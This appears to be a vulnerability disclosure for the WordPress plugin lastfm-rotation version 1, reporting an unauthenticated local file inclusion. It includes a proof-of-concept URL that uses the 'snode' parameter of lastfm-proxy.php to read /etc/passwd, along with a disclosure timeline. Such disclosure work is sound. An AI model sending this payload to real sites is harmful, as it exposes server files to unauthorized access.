wp-plugin : lastfm-rotation

Plugin Details
Plugin Name: wp-plugin : lastfm-rotation
Effected Version : 1 (and most probably lower version's if any)
Vulnerability : Local File Inclusion
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://localhost/wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=/etc/passwd

Vulnerable Parameter : snode


Disclosure Timeline
Vendor Contacted : 2014-02-19
Plugin Status : Updated on
Public Disclosure : May 28, 2014
CVE Number :
Plugin Description :
[| Last.fm Rotation will display the covers for the albums you have had in heavy rotation over the last week. It uses the Last.fm API via AJAX to fetch the data and includes a functional (albeit crude) caching mechanism to improve performance. You can make sure Last.fm gets updated with music played from different sources by utilizing one of the many scrobbler plugins available. For example, I use Rhapsody for music streaming, and therefore decided to use Rhobbler to make sure that Last.fm has a complete profile on my listening habits. Please send feedback, enhancement requests, bug details or any questions about installation to dfederighi@yahoo.com ]